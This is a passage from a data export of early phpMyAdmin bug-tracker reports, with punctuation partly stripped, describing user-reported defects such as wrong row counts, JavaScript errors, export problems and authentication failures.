If you deny this option Button No) you get the wrong message amp;quot;Your SQL query has been executed successfully amp;quot; First time I saw that message I thought I die D. Original URL https sourceforge.net p phpmyadmin bugs 911 https sourceforge.net p phpmyadmin bugs 911 Original author webmaster sod Found in version Latest Git","bug"
"24444","7283","Doubled query on Linux.
An example output query with the SELECT page, MySQL amd phpMyAdmin running on RedHat 8.0 Apache 2.0.40 and PHP 4.2.2), using inputing amp;quot;test query amp;quot; on the input field amp;quot;phrase amp;quot; SQL query [Edit] [Explain SQL] [Create PHP Code] SELECT `phrase` , `searches` , `ad` , `clicks` , `phrase` , `searches` , `ad` , `clicks` FROM `topPhrases` WHERE 1 AND `phrase` LIKE test query AND `phrase` LIKE test query LIMIT 0 , 30 which should have been SQL query [Edit] [Explain SQL] [Create PHP Code] SELECT `phrase` , `searches` , `ad` , `clicks` FROM `topPhrases` WHERE 1 AND `phrase` LIKE test query LIMIT 0 , 30 Running the exact same thing on Windows produce the latter case, no problem.
Original URL https sourceforge.net p phpmyadmin bugs 915 https sourceforge.net p phpmyadmin bugs 915 Original author dbugg Found in version 2.5.1","bug"
"24444","7284","Incorrect record count for subqueries MySQL 4.1).
When submitting a query with in my case a subquery) the results shows a wrong count Showing rows 0 0 1 total, Query took 0.0003 sec)) and it is not possible to browse the result set no back and forward arrows).
When I execute the same query in a mysql window command line), the result is correct.
Version 2.5.1; Also present in version 2.5.2 dev just downloaded and tested) MySQL version 4.1 alpha PS.
Keep up the good work!
phpMyAdmin is wonderful and very useful!
Original URL https sourceforge.net p phpmyadmin bugs 914 https sourceforge.net p phpmyadmin bugs 914 Original author anonymous Found in version 2.5.1","bug"
"24444","7285","Submit button for the table comments Form.
On this page tbl properties options.php you can change set table comments.
There is something wrong with the form, when I write the new comment and press enter the information don t get saved.
But if I write the comment and press the submit button, the information is saved.
Original URL https sourceforge.net p phpmyadmin bugs 916 https sourceforge.net p phpmyadmin bugs 916 Original author anonymous","bug"
"24444","7286","problem exporting table.
I have a MySql 4.0.13 database, but when I try to export it for backup, I m getting a failure message on 1 table.
I copy pasted the error message at the bottom of this post.
I m running phpMyAdmin 2.5.1 Can anyone help?
thanks, Roy.
roy.kroeze home.nl Warning mysql num fields ) supplied argument is not a valid MySQL result resource in usr home peatminers www phpMyAdmin 2.5.1 libraries build dump.lib.php on line 272 Warning mysql num rows ) supplied argument is not a valid MySQL result resource in usr home peatminers www phpMyAdmin 2.5.1 libraries build dump.lib.php on line 273 Warning mysql fetch array ) supplied argument is not a valid MySQL result resource in usr home peatminers www phpMyAdmin 2.5.1 libraries mysql wrappers.lib.php on line 36 Warning mysql free result ) supplied argument is not a valid MySQL result resource in usr home peatminers www phpMyAdmin 2.5.1 libraries build dump.lib.php on line 370 Original URL https sourceforge.net p phpmyadmin bugs 917 https sourceforge.net p phpmyadmin bugs 917 Original author anonymous","bug"
"24444","7287","PDF Schema doesn t scale.
Regardless of Paper Size I choose, A4 is hardcoded into the scaling factor Defines the scale factor this amp;gt;scale = ceil max this amp;gt;x max this amp;gt;x min) 297 this amp;gt;r marg this amp;gt;l marg), this amp;gt;y max this amp;gt;y min) 210 this amp;gt;t marg this amp;gt;b marg)) 100) 100; Original URL https sourceforge.net p phpmyadmin bugs 918 https sourceforge.net p phpmyadmin bugs 918 Original author skr Found in version 2.5.1 rc1","bug"
"24444","7288","Undefined variable mult btn.
Below the table overview there is a selecting box containing the options amp;quot;Drop Empty Print View Check Table Etc.
amp;quot;.
When you select an option from this selection box, the browser will react immediatly after change.
But when you then stop the browser from loading and select the default empty) option amp;quot;With selected amp;quot; the browser will return the error Warning Undefined variable mult btn in home html phpMyAdmin mult submits.inc.php on line 159 Original URL https sourceforge.net p phpmyadmin bugs 919 https sourceforge.net p phpmyadmin bugs 919 Original author nielsvdc Found in version 2.5.1","bug"
"24444","7289","Extended inserts in Export.
phpMyAdmin version is 2.5.2 rc1 in fact, but there is no option to select it on SourceForge Bug page.
If I check Extended inserts option on Export page, data rows are separated by semicolons, not by colons.
I think in previous versions it was correct.
Original URL https sourceforge.net p phpmyadmin bugs 920 https sourceforge.net p phpmyadmin bugs 920 Original author jakubvrana Found in version 2.5.2 rc1","bug"
"24444","7290","Relation view allows links to self.
Under relations view , when editting relations between tables, the interface allows linking from a field in one table to the same field in the same table, which makes little sense.
Original URL https sourceforge.net p phpmyadmin bugs 921 https sourceforge.net p phpmyadmin bugs 921 Original author milkydood Found in version 2.5.1 rc1","bug"
"24444","7291","Navigation broken in query window SQL history.
Open query window and click SQL history, all 3 links in the tabs are broken and open the main frameset within the query window instead of displaying the correct tab content.
Reproduceable always First seen in 2.5.2 rc1 2.5.1 is ok) Original URL https sourceforge.net p phpmyadmin bugs 922 https sourceforge.net p phpmyadmin bugs 922 Original author anonymous Found in version 2.5.2 rc1","bug"
"24444","7292","Javascript errors with the query window.
I think this bug isn t really the same as Bug 755394 but it s still a problem with javascript tested under IE ... not yet under Mozilla) Got the following Javascript error Line 269 Car 25 Error LockFromUpdate.checked is Null or not an object french traduction of my IE error popup) Code 0 URL http localhost phpmyadmin read dump.php I was a using the SQL Popup) window and attempting to submit a sql command file.
But PMA didn t execute it, whereas the amp;quot;main amp;quot; frame said it was successfully executed the sql window didn t close, and i got the error popup.
The problem seems to come from the amp;quot;footer.inc.php amp;quot; file which refers line 44) to amp;quot;top.frames.queryframe.querywindow.document.sqlform.LockFromUpdate.checked amp;quot; But in the sql popup the querywindow), when i look at the html source, there was no input element with name= amp;quot;LockFromUpdate amp;quot; or id= amp;quot;LockFromUpdate amp;quot; ...
So...
I look through the .php files of PMA and i found only one file refering to this mysterious amp;quot;LockFromUpdate amp;quot; It is amp;quot;tbl query box.php amp;quot; Lines 49 amp;amp; 157 Apparently i didn t notice the checkbox in the amp;quot;SQL amp;quot; page of the query window But... when you choose the amp;quot;Import files amp;quot; thumbnails, this checkbox disapears !
Even if i checked it before going to import a file, it does the same.
Continue...
Still with this query window I click on the amp;quot;SQL History amp;quot; thumbnail, and a new javascript error Line 17 Car 5 Error document.querywindow.querydisplay tab is Null or is not an object.
Code 0 URL http localhost phpmyadmin querywindow.php grrr File references footer.inc.php lines 67 amp;amp; 68 javascript) querywindow.php lines 76, 143, 164, 182 javascript) line 235 html) elsewhere many times) as a php variable tbl query box.php anywhere many times) as php variable If it can help those who work on the javascript query window part of this project, i hope i had been precise in my explanations.
Original URL https sourceforge.net p phpmyadmin bugs 923 https sourceforge.net p phpmyadmin bugs 923 Original author maxxyme Found in version 2.5.2","bug"
"24444","7293","Echo shows lower case field names.
When you create a table using the SQL text field and the GO button, the echo shows all field names as lower case.
Original URL https sourceforge.net p phpmyadmin bugs 924 https sourceforge.net p phpmyadmin bugs 924 Original author anonymous Found in version 2.5.2","bug"
"24444","7294","Importing files white page no form displayed.
First of all, my site is hosted with a FREE provider, which means, that you get a pop up window.
This may confuse the script using a STATIC !!!)
way of getting the hash value.
amp;lt;script type= amp;quot;text javascript amp;quot; amp;gt; amp;lt;!
document.writeln amp;lt;form method= amp;quot;post amp;quot; target= amp;quot;phpmain \ opener.top.frames.queryframe.document.hashform.hash.v alue amp;quot; action= amp;quot;read dump.php amp;quot; onsubmit= amp;quot;return checkSqlQuery this) amp;quot; name= amp;quot;sqlform amp;quot; amp;gt; ); amp;gt; amp;lt; script amp;gt; Problem description You say amp;quot;Import files amp;quot; and get nothing but a window with three titles, the rest below the separating horizontal line is all white.
No forms, nothing.
Browser versions OS IE 5.00.3502.1000 Opera 6.01 Win2000 SP 3 I assume the culprit is to be found within the amp;lt;script amp;gt; section posted above, because this opener.... thing doesn t seem to work anymore if ANOTHER window is opened in between.
As we are here Another thing I don t understand is the following... amp;lt;noscript amp;gt; amp;lt;form method= amp;quot;post amp;quot; target= amp;quot;phpmain4afca7b1ec36ada81827d36ae7ea442e amp;quot; action= amp;quot;read dump.php amp;quot; onsubmit= amp;quot;return checkSqlQuery this) amp;quot; name= amp;quot;sqlform amp;quot; amp;gt; amp;lt; noscript amp;gt; checkSqlQuery ) is a javascript function!!
Why do you call a javascript function in a amp;lt;noscript amp;gt;... amp;lt; noscript amp;gt; section?
I don t understand this, for amp;lt;noscript amp;gt; section is only entered if javascript is DISABLED.
Thanks for reading, ae Original URL https sourceforge.net p phpmyadmin bugs 925 https sourceforge.net p phpmyadmin bugs 925 Original author andreas e Found in version 2.5.2 rc1","bug"
"24444","7295","multiple use of TRUNCATE.
When you select multiple tables and click amp;quot;Empty amp;quot; the SQL Statement will fail, because itxc2xb4s something like the following TRUNCATE `tabelle1` TRUNCATE `tabelle2` As you can see there is no ; between the Statements.
Bye Original URL https sourceforge.net p phpmyadmin bugs 926 https sourceforge.net p phpmyadmin bugs 926 Original author killergod2000 Found in version 2.5.2 rc1","bug"
"24444","7296","Excel Headers Missing.
For some time now The export function for MS Excel doesn t provide you with the choice of exporting the headers.
Original URL https sourceforge.net p phpmyadmin bugs 927 https sourceforge.net p phpmyadmin bugs 927 Original author mrdobee Found in version 2.5.2 rc2","bug"
"24444","7297","undefined err url in mult submits.
Using PMA 2.5.2 rc2 on PHP 4.1.2 and not having DROP TABLE privilege, when I select a table via checkbox) in db structure view and use drop command from the drop down menu or trying to drop all columns of a table in table structure view this is what I get Warning Undefined variable err url in ... mult submits.inc.php on line 243 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries ob.lib.php on line 65 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries header http.inc.php on line 14 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries header http.inc.php on line 15 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries header http.inc.php on line 16 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries header http.inc.php on line 17 Warning Cannot add header information headers already sent by output started at ... mult submits.inc.php 243) in ... libraries header http.inc.php on line 20 Datenbank xyz Tabelle PMA bookmark auf localhost Fehler SQL Befehl ALTER TABLE `PMA bookmark` DROP `id` , DROP `dbase` , DROP `user` , DROP `label` , DROP `query` ; MySQL meldet You can t delete all columns with ALTER TABLE.
Use DROP TABLE instead Original URL https sourceforge.net p phpmyadmin bugs 929 https sourceforge.net p phpmyadmin bugs 929 Original author anonymous Found in version 2.5.2 rc2","bug"
"24444","7298","scripts create tables.sql.
At line 24 USE `phpmyadmin`; must be changed to USE phpmyadmin; Server Version 3.23.48 Max log Original URL https sourceforge.net p phpmyadmin bugs 928 https sourceforge.net p phpmyadmin bugs 928 Original author oleutz Found in version 2.5.2 rc2","bug"
"24444","7299","Change field wrong type.
Define a longtext with charset latin7, try to change it its type has become varchar.
Original URL https sourceforge.net p phpmyadmin bugs 930 https sourceforge.net p phpmyadmin bugs 930 Original author lem9","bug"
"24444","7300","Wrong Quotes.
In sql.php in the PMA getTableDef Function in line 316 kname = FULLTEXT| kname ; I think it should be kname = amp;quot;FULLTEXT| kname amp;quot;; Original URL https sourceforge.net p phpmyadmin bugs 931 https sourceforge.net p phpmyadmin bugs 931 Original author anonymous Found in version 2.5.2 rc2","bug"
"24444","7301","CHAR length check although field name is empty.
Adding a table and not using as many columns as you ve specified in the previous form In phpMyAdmin 2.5.2 RC2 a Javascript checks whether you ve entered a length for a varchar column.
If you left the input field amp;quot;field amp;quot; blank in previous phpMyAdmin versions these columns were ignored when adding a new table.
But due to the new JavaScript checking each length input where type=varchar, you have to set the type to something else than varchar to be able to add the table.
Otherwise it complains about a varchar column without a length specified although you ve left the amp;quot;field amp;quot; input field empty.
Original URL https sourceforge.net p phpmyadmin bugs 932 https sourceforge.net p phpmyadmin bugs 932 Original author anonymous Found in version 2.5.2 rc2","bug"
"24444","7302","quot;This is not a number quot; when fieldname empty.
Say a user asks to create a 10 fields table but when in the fields list, he decides he only want 9 fields.
The usual trick was to let the field name empty and phpMyAdmin was happy with it.
Now the new js validation triggers also for this empty field.
Original URL https sourceforge.net p phpmyadmin bugs 933 https sourceforge.net p phpmyadmin bugs 933 Original author lem9 Found in version 2.5.2 rc2","bug"
"24444","7303","InnoDB and multi columns foreign key.
I have a parent and child file pair.
ie.
one amp;quot;item amp;quot; record in the parent file has many amp;quot;event amp;quot; records in the child file) I deleted and recreated the parent file in order to change a field definition or two) and also added a couple of test records to it.
NOW ... even though I have deleted and recreated the child file, I get the following errors in phpMyAdmin when trying to a) insert records, or b) perform amp;quot;Operations amp;quot; The following shows the error messages, occuring in the amp;quot;Table maintenance amp;quot; section of the amp;quot;Operations amp;quot; window.
Table maintenance o Check table [Documentation] o Flush the table amp;quot;FLUSH amp;quot;) [Documentation] Notice Undefined index ref table name in C \......\phpMyAdmin 2.5.2 rc2\libraries\relation.lib.php on line 329 Notice Undefined index ref index list in C \.......\phpMyAdmin 2.5.2 rc2\libraries\relation.lib.php on line 330 o Check referential integrity etc.
Anybody know how to repair fix this???
Thanks Original URL https sourceforge.net p phpmyadmin bugs 934 https sourceforge.net p phpmyadmin bugs 934 Original author r white 01","bug"
"24444","7304","2.5.2 rc2) Variables Bookmarked SQL queries aren t working.
Hey, Variables in Bookmarked SQL queries don t seem to be working.
amp;quot; \{1\}blah \{2\} amp;quot; is inserted instead of the variable.
It seems the [VARIABLE] doesn t get replaced properly, instead everything in the comment gets replaced with the variable data and wrapped in \{1\} and \{2\}.
Original Query SELECT products.product id, product name, link products categories.category id FROM products, link products categories LEFT JOIN link products series ON products.product id = link products series.product id WHERE link products series.product id IS NULL AND link products categories.product id = products.product id AND link products categories.category id = [VARIABLE] amp;quot; SQL query SELECT products.product id, product name, link products categories.category id FROM products, link products categories LEFT JOIN link products series ON products.product id = link products series.product id WHERE link products series.product id IS NULL AND link products categories.product id = products.product id \{1\}blah \{2\} LIMIT 0 , 30 MySQL said You have an error in your SQL syntax near \{1\}blah \{2\} LIMIT 0, 30 at line 4 Original URL https sourceforge.net p phpmyadmin bugs 935 https sourceforge.net p phpmyadmin bugs 935 Original author pearj Found in version 2.5.2 rc2","bug"
"24444","7305","No confirmation for EMPTY table in Opera.
When you click on EMPTY when in a table menu, in Opera there is no confirmation and the table just get emptied, very scary.
I ve noticed that when you delete a row from a table it gives you a confirmation form asking whether you want to delete the row.
So I think it would be a good idea to apply the same html form confirmation to the EMPTY link.
Original URL https sourceforge.net p phpmyadmin bugs 936 https sourceforge.net p phpmyadmin bugs 936 Original author pearj Found in version 2.5.2 rc2","bug"
"24444","7306","Print view missing the tables.
There is a wrong validation on the table structure page, when calling Print view.
Original URL https sourceforge.net p phpmyadmin bugs 937 https sourceforge.net p phpmyadmin bugs 937 Original author lem9 Found in version 2.5.2","bug"
"24444","7307","Cannot build PDF page for my db schema.
When I try to create a PDF page for a database via Edit PDF Pages amp;gt; Create a New Page amp;gt; Automatic Layout) the following message is displayed in the screen 4 times amp;quot; amp;quot;Notice Undefined offset 254 in ...\phpMyAdmin 2.5.2 \libraries\string.php.lib on line 310 amp;quot; but I can go ahead and edit the page details.
Then when I try to display the PDF page I get the following error message in a dialog box amp;quot;Acrobat could not open blah.database[1].pdf because it is either not a supported file type or because the file has been corrupted amp;quot; I have tried deleting and regenerating the PDF document witrh the same results.
However, if I run phpMyAdmin 2.5.1 I can print the schema OK.
Original URL https sourceforge.net p phpmyadmin bugs 945 https sourceforge.net p phpmyadmin bugs 945 Original author tonymarston","bug"
"24444","7308","Unable to insert record with FK in another db.
I want to insert record in table intranet.user but get this error SHOW TABLE STATUS FROM `intranet` LIKE human resources.staff Incorrect table name human resources.staff I am using mysql 4.0.13 and INNODB tables with FOREIGN KEYS Structure of tables in attached file Original URL https sourceforge.net p phpmyadmin bugs 938 https sourceforge.net p phpmyadmin bugs 938 Original author aig Found in version Latest Git","bug"
"24444","7309","Latex export includes illegal character.
When exporting the database structure to Latex format, and a relationship is defined between two tables either by a InnoDB foreign key, or by PMA), the Latex text would contain amp;quot;table amp;gt; field amp;quot; in the amp;quot;links to amp;quot; column of the output.
However, the smaller than sign is an illegal character in Latex and should be contained between and .
However, fixing the code this way does not work, since the dollar sign gets converted to \ in the output trough the tex escape array).
I currently fixed it by replacing line 309 of amp;quot;libraries export latex.php amp;quot; to use a point as seperator local buffer .= res rel[ field name][ foreign table ] .
.
.
res rel[ field name][ foreign field ]; More ideally, you could use for example \rightarrow .
I don t know how this could be best fixed, but I assume that looking for an alternative character that isn t a math character in Latex) would be the easiest.
Original URL https sourceforge.net p phpmyadmin bugs 939 https sourceforge.net p phpmyadmin bugs 939 Original author hinayani Found in version 2.5.2","bug"
"24444","7310","Resource limits are not for MySQL lt; 4.0.2.
So in the forum, a user with MySQL 3.23.x reported not being able to create a user, he got an error on MAX QUERIES PER HOUR 0, MAX UPDATES PER HOUR 0 and MAX CONNECTIONS PER HOUR 0.
Original URL https sourceforge.net p phpmyadmin bugs 940 https sourceforge.net p phpmyadmin bugs 940 Original author lem9 Found in version 2.5.2","bug"
"24444","7311","HTTP auth type and Turck MMCache.
I come across the following reproduceable problem when using phpMyAdmin with Turck MMCache, I m not sure if it is a MMCache bug or a phpMyAdmin bug, but here she is When the phpMyAdmin login type is set to http and mmcache is enabled, I am unable to login.
I m presented with the regular login screen, and despite entering valid username password combinations, I m given a amp;quot;bad username password amp;quot; error after 3 tries.
However if I turn off mmcache, OR if I change to either amp;quot;config amp;quot; or amp;quot;cookie amp;quot; login types for phpMyAdmin, I have no problems and everything works like a charm.
A bug perhaps?
Relevant software being used mmcache2.3.20 phpMyAdmin2.5.2 php5.0b Apache 2.0.47 and WinXP Pro SP1; Doesn t appear to be a browser issue, tested on both IE6 and Mozilla Firebird 0.6 with same results.
Original URL https sourceforge.net p phpmyadmin bugs 941 https sourceforge.net p phpmyadmin bugs 941 Original author joekyle Found in version 2.5.2","bug"
"24444","7312","Creating a bookmark.
Gives sql.php3 Missing sql query sql.php3 Missing db Original URL https sourceforge.net p phpmyadmin bugs 942 https sourceforge.net p phpmyadmin bugs 942 Original author lem9 Found in version 2.5.2","bug"
"24444","7313","Insert data quot;Missing quot; messages.
Reproducible on servers with register globals = Off Original URL https sourceforge.net p phpmyadmin bugs 943 https sourceforge.net p phpmyadmin bugs 943 Original author lem9 Found in version 2.5.2","bug"
"24444","7314","SELECT DISTINCT broken.
MySQL 3.23.54, phpMyAdmin 2.5.2, I have a very simple email address table that returns ony the first thirty rows when I enter the following query in the SQL tab of the table SELECT DISTINCT email FROM MyMailTable WHERE 1 There should be 1700 rows.
The heading of the results says amp;quot;Showing rows 0 0 1 total... amp;quot; Entering the query into the mysql client command line works fine.
Worked in 2.3.0 from which I upgraded.
Original URL https sourceforge.net p phpmyadmin bugs 944 https sourceforge.net p phpmyadmin bugs 944 Original author jmoyize Found in version 2.5.2","bug"
"24444","7315","Copy a table Missing db.
now fixed in cvs Original URL https sourceforge.net p phpmyadmin bugs 946 https sourceforge.net p phpmyadmin bugs 946 Original author lem9 Found in version 2.5.3 rc1","bug"
"24444","7316","Table operations breaks selective replication.
Some of the operations that phpMyAdmin allows you to perform on a table ignore the possibility of non standard Mysql replication setups.
In our setup, we have four slave servers replicating only two out of a possible four databases from one central server.
So, out of db1, db2, db3 and db4, for example, only db1 and db2 are replicated by the slave servers.
The problem arises when an operation performed on one of the replicated databases involves one of the non replicated databases.
For instance, copying or moving a table from db1 to db3 will break our replication setup.
I select db1 in the interface select the table I want to move table1) click the Operations link move table1 to db3 Here s the SQL that is run CREATE TABLE `db3`.`table1` `id` int 10 ) unsigned NOT NULL AUTO INCREMENT , name varchar 20) NOT NULL, PRIMARY KEY `id` ) , ) TYPE = MYISAM AUTO INCREMENT = 852; INSERT INTO `db3`.`table1` SELECT FROM `db1`.`table1` DROP TABLE `db1`.`table1`; The issue is that phpMyAdmin apparently runs this command via a connection to db1.
db1 is replicated out to all of the slave servers, none of which know anything about db3, thus breaking our replication.
Seems to me the solution would be to only perform write type commands over connections to the actual database being affected, rather than cross database connections.
In other words, before the CREATE statement above, the connection needs to be to the db3 database, and before the DROP TABLE it needs to be switched back to db1.
Original URL https sourceforge.net p phpmyadmin bugs 947 https sourceforge.net p phpmyadmin bugs 947 Original author lbjay","bug"
"24444","7317","Keyword field names become capitalized.
I ran into this bug while replicating tables using the phpMyAdmin Export function from phpMyAdmin 2.3.3 or so.
I noticed you have fixed the export function so it displays field names in backticks which presumably makes the import work, but when you run the old query it still capitalizes keywords in my case first and status became FIRST and STATUS).
However, I think it would make sense to support keyword field names as typed into the SQL dialog box because ad hoc table creators tend to skip the backticks except when necessary.
Original URL https sourceforge.net p phpmyadmin bugs 948 https sourceforge.net p phpmyadmin bugs 948 Original author jiblet Found in version 2.5.2 pl1","bug"
"24444","7318","Tabs and empty values.
When exporting CSV and delimiting with tabs \t), if the last field on a line is NULL, the delimiter isn t added, i.e.
id\tname\tpassword 1\tjoe\t1234 2\ttom Even if amp;quot;fields enclosed by amp;quot; is specified, null fields are dropped.
Original URL https sourceforge.net p phpmyadmin bugs 956 https sourceforge.net p phpmyadmin bugs 956 Original author pands Found in version 2.5.1","bug"
"24444","7319","Bookmark function stores only last query.
If you enter multiple queries in the SQL dialog box, and then bookmark that query, only the last query will be stored in the PMA bookmark table.
e.g.
SELECT totalMembers = COUNT ) FROM `users users`; SELECT COUNT ) AS `Members` , ROUND COUNT ) totalMembers) 100) AS `Percent` , State FROM `users users` WHERE LENGTH State ) = 2 GROUP BY State HAVING COUNT ) amp;gt; 8 ORDER BY 1 DESC; The bookmark will not work, because it doesn t capture the first query which sets the MYSQL variable called totalMembers Workaround You can use phpMyAdmin to manually edit the bookmarks in the PMA bookmark table to contain more than a single query.
Original URL https sourceforge.net p phpmyadmin bugs 949 https sourceforge.net p phpmyadmin bugs 949 Original author freephile Found in version 2.5.1","bug"
"24444","7320","amp;quot; amp;quot; sign changed in space Enum field).
I have the following error I have a table with an enum field.
In the list of allowed values there are some with a amp;quot; amp;quot; char.
If you try to edit a record and change the value of the enum field, selecting one of the values with the char, the update shows an empty field.
Looking at the query exposed, I noticed that the char has been replaced by a space.
Is this bug been already tracked?
I am using phpMyAdmin 2.5.1 with MySQL 3.23.56 Original URL https sourceforge.net p phpmyadmin bugs 950 https sourceforge.net p phpmyadmin bugs 950 Original author deligant Found in version 2.5.1","bug"
"24444","7321","Notice while adding a user.
phpMyAdmin is installed on the server root, with the error below occuring at the address below.
I believe I ve seen this problem in 2.3 .
Notice home www html sites phpmyadmin.cyber sonic.com web server privileges.php519 server privileges.php?lang=en iso 8859 1 amp;amp;server=1 amp;amp;adduser=1 Not sure if this has been fixed or reported since then.
Original URL https sourceforge.net p phpmyadmin bugs 951 https sourceforge.net p phpmyadmin bugs 951 Original author mgturland","bug"
"24444","7322","Blank right frame on display of very long tables.
Depending on the width of the table, very large tables greater 500 to 1000 rows) cannot be displayed with phpmyadmin 2.5.2 any more, as it was possible with earlier versions.
After selecting a table, then amp;quot;Browse amp;quot; and entering something like amp;quot;show 500 rows starting from 1 amp;quot;, the browser mozilla Windows NT and konqueror debian GNU Linux) shows a blank right frame.
It is of course possible it is a server upgrade issue apache 1.3.27.0 1 on debian unstable).
Original URL https sourceforge.net p phpmyadmin bugs 952 https sourceforge.net p phpmyadmin bugs 952 Original author hazzy Found in version 2.5.2","bug"
"24444","7323","Check for DROP DATABASE.
in SQL.php around line 58 in 2.5.3 rc1 amp;amp; amp;amp; eregi DROP[[ space ]] IF EXISTS[[ space ]] )?DATABASE[[ space ]] , sql query)) \{ The amp;quot;IF EXISTS amp;quot; part of the regex needs to be AFTER the DATABASE.
Yes?
Original URL https sourceforge.net p phpmyadmin bugs 953 https sourceforge.net p phpmyadmin bugs 953 Original author anonymous","bug"
"24444","7324","Created database not listed using es iso 8859 1).
After succesfully creating a new table, it won t show up in the databases list when using language spanish es iso 8859 1) it does show when you change to other languages).
If you select enable statistics it appears after a refresh.
It does show up in the combo box on the left frame, though.
Ixc2xb4m using phpMyAdmin 2.5.1, MySQL 3.23.52, php 4.2.2 and Apache 2.0.40 Original URL https sourceforge.net p phpmyadmin bugs 954 https sourceforge.net p phpmyadmin bugs 954 Original author juancho martin Found in version 2.5.1","bug"
"24444","7325","Documentation.html mistakes.
I ve found a few mistakes in the documentation.
Line 276.
Is GRANT SELECT, INSERT, UPDATE, DELETE ON amp;lt;pma db amp;gt; TO pma localhost ; Should be GRANT SELECT, INSERT, UPDATE, DELETE ON amp;lt;pma db amp;gt;.
TO pma localhost ; Line 3092.
Is ...but 300 100 is a good start... Shoul be ...but 200 100 is a good start...
Original URL https sourceforge.net p phpmyadmin bugs 955 https sourceforge.net p phpmyadmin bugs 955 Original author ubanus Found in version Latest Git","bug"
"24444","7326","php error 19404 re mbstring.
I get this message when i load index.php I tried all the latest releases including the dev realease.
You are using PHP 4.2.3, which has a serious bug with multi byte strings mbstring).
See PHP bug report 19404\.
This version of PHP is not recommended for use with phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 957 https sourceforge.net p phpmyadmin bugs 957 Original author tjnemez","bug"
"24444","7327","FAQ about left.php Missing hash.
I get the error left.php Missing hash in the left frame when attempting to run phpMyAdmin 2.5.2 pl1.
I am using PHP 4.3.2 Apache 1.3.27 MySQL 4.0.14 My PHP is built like this .
configure with apxs= usr sbin apxs with mysql= usr enable sockets with zlib with gd with jpeg dir with ttf with freetype dir with gettext with xml with mcrypt with imap with kerberos with imap ssl I searched through config.inc.php for a setting I may have missed.. but found nothing.
Same settings as my other phpMyAdmin install.
Original URL https sourceforge.net p phpmyadmin bugs 958 https sourceforge.net p phpmyadmin bugs 958 Original author alfredenewman","bug"
"24444","7328","HTTP authentication fails with PWS 4.0.
With this configuration phpMyAdmin 2.5.2 rc2 Windows 98 S.E.
Personal Web Server 4.0 PHP 4.3.2 loaded as ISAPI module mySQL 4.0.13 max Client API Version 3.23.49) Internet Explorer 6.0 SP1 6.0.2800.1106) If amp;quot;register globals = Off amp;quot; in amp;quot;php.ini amp;quot;, HTTP authentication rejects all users passwords, including valid ones.
Actually, the function amp;quot;PMA auth check ) amp;quot; defined in amp;quot;http.auth.lib.php amp;quot; doesnxc2xb4t verify the variable HTTP SERVER VARS[ HTTP AUTHORIZATION ] or equivalent in PHP 4.1 SERVER[ HTTP AUTHORIZATION ] PHP manuals tells that this variable s) must be used with IIS and also PWS).
This is a transcription amp;quot;...Another limitation is if you re using the IIS module ISAPI), you may not use the PHP AUTH variables but instead, the variable HTTP AUTHORIZATION is available.
For example, consider the following code list user, pw) = explode , base64 decode substr SERVER [ HTTP AUTHORIZATION ], 6))); ... amp;quot; This bug can be fixed checking out if variable HTTP SERVER VARS[ HTTP AUTHORIZATION ] is defined and is not empty, under section amp;quot; Gets authenticated user settings with IIS amp;quot; inside amp;quot;http.auth.lib.php amp;quot; file.
Thanks... Carlos Jorge Torres Figueira Clorinda Formosa Argentina Original URL https sourceforge.net p phpmyadmin bugs 959 https sourceforge.net p phpmyadmin bugs 959 Original author mctango","bug"
"24444","7329","Query re execution when use Create PHP code .
I saw this bug on W2k PHP 4.2.0, but it also could happened on Linux OS...
I drop a table by clicking drop on table structure view.
I click YES on confirm dialog box.
When query of DROP is display on top) i click on Create PHP code all is ok When i click again on this link now called Without PHP code ), it asked me Do you want to drop table xxxxxxx [YES] [NO] ... and it create error cause table is already dropped.
Sorry for my english, hope it s a bug, hope it helps.
Original URL https sourceforge.net p phpmyadmin bugs 960 https sourceforge.net p phpmyadmin bugs 960 Original author tubbix Found in version 2.5.2 pl1","bug"
"24444","7330","Failure to properly escape HTML in field.
I have a column in a table which is a VARCHAR 64).
I entered a new row with the contents amp;quot; amp;lt;sip abc 10.1.1.1 amp;gt; amp;quot;.
When I view this row in the browse function, the field appears empty.
This is because phpMyAdmin fails to escape the angle brackets.
The HTML source includes the actual string amp;quot; amp;lt;sip abc 10.1.1.1 amp;gt; amp;quot; where it should instead include the string amp;quot; amp;amp;lt;sip abc 10.1.1.1 amp;amp;gt; amp;quot;.
Of course there are other characters that need escaping as well, such as ampersand, etc.
Original URL https sourceforge.net p phpmyadmin bugs 970 https sourceforge.net p phpmyadmin bugs 970 Original author archiecobbs Found in version 2.5.2 rc2","bug"
"24444","7331","wrong row count with explicit LIMIT.
Showing rows 0 99 1000 total, Query took 0.0122 sec) SQL query [Edit] [Explain SQL] [Create PHP Code] SELECT `time` , `pass` FROM `password` ORDER BY `pass` DESC LIMIT 1000 amp;lt; amp;lt; this is the text from my PHPMyAdmin 2.5.3 rc2 exactly I thing amp;quot;Showing rows 0 99 amp;quot; ... in real show 0 999 ........
Original URL https sourceforge.net p phpmyadmin bugs 961 https sourceforge.net p phpmyadmin bugs 961 Original author jenix","bug"
"24444","7332","Can t drop fields.
I have 2.5.3 rc1 When I check on some fields to drop delete) it drops the firft one and gives the field edit form for the selected fields though the first one is already deleted!
Original URL https sourceforge.net p phpmyadmin bugs 971 https sourceforge.net p phpmyadmin bugs 971 Original author anonymous Found in version 2.5.3 rc1","bug"
"24444","7333","GRANT Statement not working .... Why does following statement, send via SQL Box, not work anymore??
GRANT ALL ON wurst.
TO wurst localhost IDENTIFIED BY wurst ; It returns 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near BY wurst at line 1 and a malformed Statement GRANT ALL ON wurst.
TO wurst localhostIDENTIFIEDBY wurst is displayed??
Original URL https sourceforge.net p phpmyadmin bugs 973 https sourceforge.net p phpmyadmin bugs 973 Original author gothfather Found in version 2.5.3 rc1","bug"
"24444","7334","PHP3 and PMA showMySQLDocu ).
Garvin, this function should be defined before PMA mysqlDie ).
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 962 https sourceforge.net p phpmyadmin bugs 962 Original author lem9","bug"
"24444","7335","Can t set ENUM field to NULL.
